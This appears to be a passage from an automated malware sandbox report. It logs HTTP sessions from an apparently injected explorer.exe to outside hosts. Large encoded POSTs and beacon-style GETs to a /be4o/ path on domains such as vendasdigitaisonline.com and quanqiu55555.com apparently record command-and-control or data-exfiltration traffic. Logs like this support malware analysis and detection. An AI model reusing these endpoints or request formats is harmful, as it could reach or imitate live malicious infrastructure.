                                                                                                                                                                                                                              20192.168.11.2049803213.190.6.6380C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.654201984 CET9041OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.vendasdigitaisonline.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.vendasdigitaisonline.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.vendasdigitaisonline.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 30 65 7e 4a 38 43 75 59 35 56 63 4d 58 32 7e 59 45 78 4c 61 78 52 53 74 71 37 57 56 6f 6b 4a 35 52 67 42 77 32 61 47 50 6e 47 31 35 54 39 28 2d 35 6f 44 69 62 7a 35 75 35 6c 33 35 6b 30 28 48 37 52 44 74 54 76 6a 36 71 38 76 44 4c 73 63 36 42 36 47 31 6c 36 59 67 37 6d 4e 70 33 73 71 39 69 63 35 42 6b 2d 6a 36 4e 42 62 4d 77 62 52 69 79 4a 4b 38 32 53 4f 52 74 75 45 75 61 70 28 72 68 68 7e 56 57 4c 4e 33 54 76 78 51 41 61 31 79 6e 30 32 58 48 7a 73 58 6e 38 66 68 53 77 54 70 6c 4f 64 44 6e 7a 39 30 72 4b 50 6c 69 32 37 58 44 57 45 72 78 63 6d 79 28 5a 69 34 62 4d 65 49 78 7a 6c 4d 6d 61 73 45 32 4a 6b 37 77 52 4f 4d 39 67 56 58 4b 47 67 32 72 6a 6b 46 45 50 6d 53 62 45 74 7a 42 47 65 41 76 52 50 5a 37 46 79 44 4d 63 4d 31 78 2d 69 48 58 66 46 66 59 32 4f 4c 75 71 44 53 38 65 63 6d 69 7a 70 6a 39 78 51 50 31 4b 45 5a 35 58 49 46 6d 78 4d 68 4b 64 67 39 74 59 52 34 79 4c 36 7a 52 2d 63 65 63 78 4f 46 4e 77 53 46 52 73 62 56 4f 56 44 5f 38 57 59 51 66 76 78 31 78 51 43 64 79 76 32 64 45 7a 57 67 31 39 32 6f 39 36 6f 69 39 55 7e 61 7a 73 34 76 53 36 35 69 4a 33 48 6a 68 6d 69 63 63 78 62 55 30 31 64 7a 75 43 48 74 4b 35 6b 58 58 62 75 55 4c 42 30 74 7a 4b 6f 61 48 46 79 6d 49 31 49 70 4c 39 65 57 34 4d 50 45 4e 41 67 4c 36 32 70 78 7a 54 45 72 47 39 39 50 38 44 65 5f 74 51 62 76 4e 53 7a 36 58 6c 67 30 31 70 6d 46 71 7a 53 73 37 51 37 63 65 36 33 65 47 65 68 57 46 6c 75 6e 7a 58 4a 46 35 2d 77 5f 55 67 56 33 5a 4d 41 35 46 53 78 42 63 53 41 70 38 32 64 6a 6d 52 4c 65 68 67 56 31 50 59 6a 39 6e 53 4a 35 61 5a 6a 7a 41 6e 4f 46 62 6d 4b 58 36 63 47 30 48 52 62 4c 54 73 46 66 47 72 6a 65 41 5f 54 6b 41 77 44 6c 6f 42 30 6a 68 67 53 52 46 59 33 52 28 6f 78 2d 48 76 65 71 4d 6e 72 5f 61 52 36 47 79 52 43 41 76 71 79 7a 79 71 77 55 65 73 63 39 54 50 4b 49 7e 4c 30 39 61 53 73 4a 5a 61 36 46 41 34 59 72 34 33 5a 35 34 37 71 43 66 49 58 5a 4e 5a 4f 41 6b 58 76 4b 64 76 56 74 59 6a 4f 74 52 6d 54 71 59 5f 79 34 35 78 6c 5f 61 44 39 31 56 6a 36 79 52 44 48 31 4a 61 4e 37 70 67 6c 72 51 6c 4d 51 63 6b 4c 79 4d 34 6d 46 72 37 33 75 67 37 55 6c 66 55 43 77 78 70 6a 73 73 4e 4c 58 53 54 57 5a 28 48 7e 2d 39 4b 79 62 44 62 4a 33 61 31 49 4e 47 77 67 5a 75 61 59 43 39 45 56 47 4f 55 37 37 61 41 69 53 44 50 71 4e 6e 46 64 49 66 35 42 46 59 34 63 68 4a 31 66 4d 50 37 49 79 6b 41 47 34 7e 4e 52 43 65 77 70 42 6d 53 65 6e 32 46 64 43 53 4a 77 66 28 77 44 43 46 46 78 65 42 45 31 4a 70 5f 48 6a 67 4e 63 48 78 47 7e 42 4d 4b 64 47 41 65 34 61 74 64 6c 43 54 4f 77 6f 31 55 73 5a 6e 38 35 31 65 47 44 43 50 52 62 43 71 59 54 75 6c 34 31 6d 36 30 62 5a 57 50 48 48 53 36 50 30 6c 32 6b 65 58 45 7e 31 35 70 46 37 7a 45 34 4b 70 6c 64 75 37 67 39 76 72 4f 28 5f 31 58 55 61 5a 46 57 53 4d 31 46 33 72 30 6b 78 4f 61 70 4b 31 31 42 6d 62 78 6f 4d 5a 4b 30 51 45 5a 7a 73 6e 38 33 48 42 75 4a 6c 58 54 6f 69 4c 69 55 48 49 72 42 39 6a 4f 42 72 72 59 77 74 61 5f 68 62 50 38 34 5f 71 31 72 42 73 45 5a 64 54 35 63 30 55 62 54 4d 31 62 72 4a 39 4b 75 69 4a 5f 69 65 45 63 30 6d 54 56 66 78 4c 52 38 38 51 44 50 77 5a 4e 4e 6e 66 4c 74 47 61 43 76 38 42 4f 51 44 4a 68 6f 42 43 77 71 45 52 56 41 39 61 69 46 78 67 5a 41 66 54 47 38 35 4f 6d 6b 53 51 61 57 72 38 73 78 47 56 64 6b 68 51 70 30 76 41 46 34 6f 28 69 66 64 30 69 51 2d 67 76 47 49 35 45 34 4c 4e 5f 5a 77 31 66 77 42 55 4f 66 33 79 32 51 36 74 69 61 4d 55 48 66 72 58 46 46 79 6f 68 4e 66 76 51 59 69 70 4a 35 55 38 42 62 70 47 39 78 53 4d 4f 4f 52 45 41 41 6a 4d 71 33 53 63 76 35 35 44 7a 78 49 42 55 62 79 4f 35 68 4a 50 6b 6f 73 4f 32 6d 61 46 48 32 78 36 71 46 45 35 62 52 53 4e 73 49 36 65 73 53 34 49 62 33 4f 5a 47 56 73 75 41 43 78 42 72 45 79 6f 55 36 35 36 2d 46 57 64 4e 54 69 75 4f 50 73 42 65 6b 69 7e 46 63 41 72 47 51 34 61 69 6b 69 38 61 37 63 6a 33 72 44 6a 57 6d 38 73 7a 48 58 72 76 77 5a 59 66 7e 38 42 4f 44 57 53 30 62 47 45 39 71 4a 7a 2d 6c 70 35 48 6f 30 63 66 6b 41 66 5a 42 58 6a 65 79 32 74 30 43 45 56 53 7e 79 76 5f 70 5a 75 6c 65 30 39 4f 64 74 7a 62 6f 31 73 41 59 46 52 67 53 70 55 71 65 61 7e 67 59 74 6e 4b 67 46 69 72 67 52 59 30 5a 56 49 6a 6b 32 48 57 70 6d 46
                                                                                                                                                                                                                              Data Ascii: h48Hl=0e~J8CuY5VcMX2~YExLaxRStq7WVokJ5RgBw2aGPnG15T9(-5oDibz5u5l35k0(H7RDtTvj6q8vDLsc6B6G1l6Yg7mNp3sq9ic5Bk-j6NBbMwbRiyJK82SORtuEuap(rhh~VWLN3TvxQAa1yn02XHzsXn8fhSwTplOdDnz90rKPli27XDWErxcmy(Zi4bMeIxzlMmasE2Jk7wROM9gVXKGg2rjkFEPmSbEtzBGeAvRPZ7FyDMcM1x-iHXfFfY2OLuqDS8ecmizpj9xQP1KEZ5XIFmxMhKdg9tYR4yL6zR-cecxOFNwSFRsbVOVD_8WYQfvx1xQCdyv2dEzWg192o96oi9U~azs4vS65iJ3HjhmiccxbU01dzuCHtK5kXXbuULB0tzKoaHFymI1IpL9eW4MPENAgL62pxzTErG99P8De_tQbvNSz6Xlg01pmFqzSs7Q7ce63eGehWFlunzXJF5-w_UgV3ZMA5FSxBcSAp82djmRLehgV1PYj9nSJ5aZjzAnOFbmKX6cG0HRbLTsFfGrjeA_TkAwDloB0jhgSRFY3R(ox-HveqMnr_aR6GyRCAvqyzyqwUesc9TPKI~L09aSsJZa6FA4Yr43Z547qCfIXZNZOAkXvKdvVtYjOtRmTqY_y45xl_aD91Vj6yRDH1JaN7pglrQlMQckLyM4mFr73ug7UlfUCwxpjssNLXSTWZ(H~-9KybDbJ3a1INGwgZuaYC9EVGOU77aAiSDPqNnFdIf5BFY4chJ1fMP7IykAG4~NRCewpBmSen2FdCSJwf(wDCFFxeBE1Jp_HjgNcHxG~BMKdGAe4atdlCTOwo1UsZn851eGDCPRbCqYTul41m60bZWPHHS6P0l2keXE~15pF7zE4Kpldu7g9vrO(_1XUaZFWSM1F3r0kxOapK11BmbxoMZK0QEZzsn83HBuJlXToiLiUHIrB9jOBrrYwta_hbP84_q1rBsEZdT5c0UbTM1brJ9KuiJ_ieEc0mTVfxLR88QDPwZNNnfLtGaCv8BOQDJhoBCwqERVA9aiFxgZAfTG85OmkSQaWr8sxGVdkhQp0vAF4o(ifd0iQ-gvGI5E4LN_Zw1fwBUOf3y2Q6tiaMUHfrXFFyohNfvQYipJ5U8BbpG9xSMOOREAAjMq3Scv55DzxIBUbyO5hJPkosO2maFH2x6qFE5bRSNsI6esS4Ib3OZGVsuACxBrEyoU656-FWdNTiuOPsBeki~FcArGQ4aiki8a7cj3rDjWm8szHXrvwZYf~8BODWS0bGE9qJz-lp5Ho0cfkAfZBXjey2t0CEVS~yv_pZule09Odtzbo1sAYFRgSpUqea~gYtnKgFirgRY0ZVIjk2HWpmFH0vgN8SEI3KQKB8e4iqxStReFitugy3LdLlof6g04NJF3nbOjaT3BPWOlBXGWTCmhqdKby-zIl-5tMayaGM8b1EbR25g75p04YD0imUr-6sFMmwtDuUmVukbsfV4prVI1JQ6NIYmLG57VEe8PPL(y4V7k44T1R-hdFJbit1YKqzgg8bMxS6DNyDDURQA6~YCiQkTJhQnvRe6jtr6a1bujThEQIV1rclgg87TriQjkD2tnotHoY5P8UYy7nCaW~ofxMaMtvMecUMlOHx2bdYi2yA(mKIMVK8Umuckw2hH1DtWtWeXwa6hwod9oO9L0roTf(LyTPmNocr5KzvcKOKOrzesi54A-LbruOiKFmRhV7cZ4PTJWKS9nh7gRvA61PnWwjS7vrnEuvN81SDIffcu6XKzBE0aCNOuwOArr2zDlwzX4A0WxQqd24YAXs1M0YgZ1gfYnfCLe(mKuBVBHCil_Xv0Y0iKBSSnt(xI46jU29-4oMhMOvGxnU6Lw0H1I(0luig(iJHfngv7a8gNc(iV8gvtvEX3q7-7ISPFTqlPyyUlaJNzDw9RVEmGZYVK_xdFVpHa6LJ0wawpwx1up75V8MKgT7edYEBQhGXPn952p(cah7qBhZJSYutPCC4NffsVXWix6Fej25N35BNBeHd3yJI4SjSbC~F(XKfB5v5OL3QRiJV4prIubmVyRZq8FGu2gugH9ruNaLF0Eew4_JgVgBM~UshPnJ1NxdgEU9hWlKOa2L8Re1ppqi4NO9VGQz0YNqWtrfZ0GT-Z-TcyPyLOXJXb-juYyG4ImHT0i2uLrT-afv2BB3V1XiHjE6yBHeM6AgxRJdK0STfwSov6WRdaCh8gD~l1TK9xUj4YImi~OgXgha-JQOYbVpjddTqGcLDU6JgQosy2BfekbdmEVRfMU~UIf0sj7Nbs3tQ1fh_e7KR2T73BAuClNJAWmzObO4iveNlcIzLviKTE8RPsreethFEE056kz52Z0yretEMlVUDNjJj61CuxqTRrl6_PEtK9pq3wytwynM6CbvFmjF3IpjHfeAYY4cONjf3D0y8616BTUhHFVCfI2LezqIb9JTIYv88Bn1hXYLKM8RcwPY_2L3MBNhJcxM0Frz4zdxHSROVg971xdZHr_v0kSTWKWJNqWMh(DJhII5LxK8czvzqSALyEl2NY_IRCYzJ943RUwkyNV(O2QynZ0y3xuSCnjO9VOMrULB_JnfXug8k4UWD759BhUncvRENGlQYzrXnXgSntnl8boFMPNZq9dXH02uMI8SBxSwsefaER9Q9j4qkcxYNBI8PxZD6oQjqceKG~dpc8cEnzZoJcOWlqJ~ixFL1Fv3ZPbTdPDDkSvZ2SabeAyih2_zaTQHGn6vyoinwsNpEyrxgDevLb6f59ncc6qr9HbyeQmfqSJ4rPoa0FYLuhF7_VyIIiitpKyWt9HzfwVeYZbSJY3VA9CntjWOOSXMFi_c2GJjVPonG8qPCvNPAjepOLZu7(tjw2MTxzp~eU1q57L5Q7OqM(bdKH491c7sItLKLkNDiHBkNEarEql3q8cbxfsxjEs1FDgmvNIvEIXWTiRTG06Fp9f8Ao1oFUJQnIDBjrfqiRaAJJMH0ILNoHgMyiyUWAhALmCoUoY4aI_C5pT~Rr4wnktoPQce6oZBrHwjNu1kUTHSkcnBOtO7uDfvGLjg0supmDRIcw1xjCUVlBGkoDw5VyD12GT6abobzTVxmok0t785leSXvf3sdaqB33AKMeC8KlffFHF5VAUNlGptyv_WikZm87Ecasjeemi(fSBInc8lOa5o95zCtx2JvDDSU9TE6jyjO1LPjHAknma8Bo0OSbdcZR33R9xnJb-PpjmROy3SLKsVaS4ia6tAdz4FRf-C0OCd7qrO30SZXm2j3dwsPLZ7F09ffqYEodlb_~wljeETvUlKZX1zRopQ36AQnpUJwp-oHOc3vMtmpjupAFFMw6VI7BjHGFzbR6HF5Ac4z8k4J4cv8iYWdnf4C(hl9rW9eyXFYc8D28KrnwKQA2Ee1g8eu(qDpcoAp7wuSOl~rV7LZc8hA8GWqsz2AjNQdyXUu(AA9234z9M3Pm9ii5kSOdnn_iCItQ_Mr(RtiZpxUD1qCVXIrj40piG4LRCn6BfMicCTLPHCf7nxj2H9Za_zQiQXZkEzf4clq7JlplGNQGgYGrymFhOApPJlnqc1EVl6g5Gg8gxDR5fk-dzY6~V9GLVSVfslxcDwbtmbqIn8IikGXbKmeHFPakTcqWxvuA3qA5WEvJ7jGzpkcXhV_b1dIGT6XkQ30(2bvw1F-9nkRP1migEQMY6ThQ6~xnalOjhoTu42E3fK-xwzy4Guo96DavoU02HYcUywxiBLi2NIZqN(gI-p5LbPxmYaWl_PtS3NS7MTKPx3jzH6ySnIwg1Q_FqW9aYEs6iFeq9eeyu7_yMkUcV8wGweNYcgM6uECZ4qbNqwDK2R-bWMjNwHLI34U5Nj67-wtsE3EyoHF6x0bU919Lo20WSQP~b9Af_hOG6t52DwYenXrYIucx7cGCLsHB2jTVwaDepBHnn5hcMSNzOFW7Ayipcf_ygPsG2gRhSVJ~Cgn~tu0VoDKQ-~bhkko0OCZvHdlZHekWJ23R5Kx8pdUlJO46Dz_5tCm6gcemKV3K0TtEAbnfWmz7nTp(DIwtq35YNFB3A0Zk-AvpnBUQamyHDR8qOQQkZ7iXb6aC7b6OWqt
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.654282093 CET9049OUTData Raw: 31 69 62 59 69 48 30 6b 65 35 77 63 50 7a 5f 64 48 69 35 63 71 44 77 64 48 5a 57 30 6f 5a 42 62 70 73 76 62 53 58 48 5a 32 4b 43 57 38 6a 70 4f 72 38 7a 73 61 6d 4e 7a 32 74 52 74 4c 73 64 6e 7a 4d 6f 44 34 48 74 79 65 41 58 37 35 67 6c 6c 6b 54
                                                                                                                                                                                                                              Data Ascii: 1ibYiH0ke5wcPz_dHi5cqDwdHZW0oZBbpsvbSXHZ2KCW8jpOr8zsamNz2tRtLsdnzMoD4HtyeAX75gllkT1pQSYoAsXk139lYgxpQC4Tg74T0noiqznMi0RFPZP2oxM1v7nqebaz6hlZgn19RLQmMvxe1fxmThSu9qmHZmkjOc5Z6Di~Wp8PyLsso1-v82VXPiU(Hq1o6BQTfit0xEOUB9pYpcznJif5sFSYYblPvKHy6ETCFKa
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.768825054 CET9055OUTData Raw: 79 70 6c 7e 4c 30 56 4e 45 49 55 67 53 42 46 55 4a 32 52 38 46 58 4a 4a 58 42 4a 6f 4e 34 63 76 35 62 48 37 49 6b 5a 57 4d 39 65 6b 31 32 76 78 2d 6e 77 6a 33 47 30 59 36 7a 6c 65 67 4a 2d 56 39 50 36 75 6a 46 42 53 59 50 38 79 30 31 4f 49 44 54
                                                                                                                                                                                                                              Data Ascii: ypl~L0VNEIUgSBFUJ2R8FXJJXBJoN4cv5bH7IkZWM9ek12vx-nwj3G0Y6zlegJ-V9P6ujFBSYP8y01OIDTP1B810v4qehwL5vie8sMVUJujpj99GMTpSPHZaoo_UeEeW3S_FFRP5ajnUbPzYVHKbJk0dg2-2i(bPL3RdbcnM52bWR5WGsinbTsCh3Gga_Mexw4L9lpaLxMj5IGggGz4sRyQB9c1nqtRSLalBnH9Ej84GPZtOLwT
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.768925905 CET9056INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                              content-length: 707
                                                                                                                                                                                                                              date: Mon, 21 Feb 2022 15:54:00 GMT
                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                              location: https://www.vendasdigitaisonline.com/be4o/
                                                                                                                                                                                                                              content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.768996954 CET9059OUTData Raw: 7a 31 4f 75 51 28 58 59 56 45 39 48 52 36 48 28 67 65 51 55 5f 6f 35 32 52 4a 65 72 58 6d 58 75 39 71 7a 33 55 39 57 4e 69 63 37 66 58 48 52 44 30 47 43 61 56 71 48 4f 74 64 52 34 42 42 39 5a 34 30 32 7e 52 78 55 6e 54 65 36 68 36 67 49 34 6b 47
                                                                                                                                                                                                                              Data Ascii: z1OuQ(XYVE9HR6H(geQU_o52RJerXmXu9qz3U9WNic7fXHRD0GCaVqHOtdR4BB9Z402~RxUnTe6h6gI4kGKgZWLx9mcqDtCzo5WyHEs4KMWXs(xf15IJCzeqWhfsIt3ERBTI4UXhY4o9hQtNixcrx0KxcrktfTMG2ispKmv21qeRSdksggHBJXE4QaLWJFGLcW47sLy0NrkZ2xfmiXnhTQ_nuNXrG1ILianoEPDDjEb3T8r3KmJ
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.769172907 CET9061OUTData Raw: 6e 35 56 31 54 32 57 54 42 71 51 38 4c 64 35 31 37 73 42 5a 35 48 70 33 69 37 48 62 73 7a 5f 41 68 32 71 69 6e 4c 65 54 75 6b 46 36 39 79 78 68 56 78 46 63 41 4a 30 4a 78 44 6f 58 5f 5a 68 41 37 34 61 78 67 42 66 77 75 49 50 50 7a 4e 48 65 54 73
                                                                                                                                                                                                                              Data Ascii: n5V1T2WTBqQ8Ld517sBZ5Hp3i7Hbsz_Ah2qinLeTukF69yxhVxFcAJ0JxDoX_ZhA74axgBfwuIPPzNHeTsK4LmxHZAmuNc3MjM6ArP0DiJ9VspOZTRk5iueG2~dsZUQd4nybAA2u13DYT~_TrwHCs1RX3PSlcBdEMVFNy9zsoDxuixCa9EQLRpSEsxc(m8URE6i967EKQNEjfQ59USnHRGKF4(CBEQZBCKItcZWTPvS7gZZdJnc


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              21192.168.11.2049804213.190.6.6380C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.771672010 CET9062OUTGET /be4o/?h48Hl=7cKzimu7mUkgDRyMKljMoWyo6u+mjltrVmMX1NSvq0diecWuw4+QXmAspWvQrjbM5ify&w6=ZbFDmL HTTP/1.1
                                                                                                                                                                                                                              Host: www.vendasdigitaisonline.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:54:00.888521910 CET9063INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                              content-length: 707
                                                                                                                                                                                                                              date: Mon, 21 Feb 2022 15:54:00 GMT
                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                              location: https://www.vendasdigitaisonline.com/be4o/?h48Hl=7cKzimu7mUkgDRyMKljMoWyo6u+mjltrVmMX1NSvq0diecWuw4+QXmAspWvQrjbM5ify&w6=ZbFDmL
                                                                                                                                                                                                                              content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              22192.168.11.204980538.143.0.8280C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.067137003 CET9066OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.quanqiu55555.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.quanqiu55555.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.quanqiu55555.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
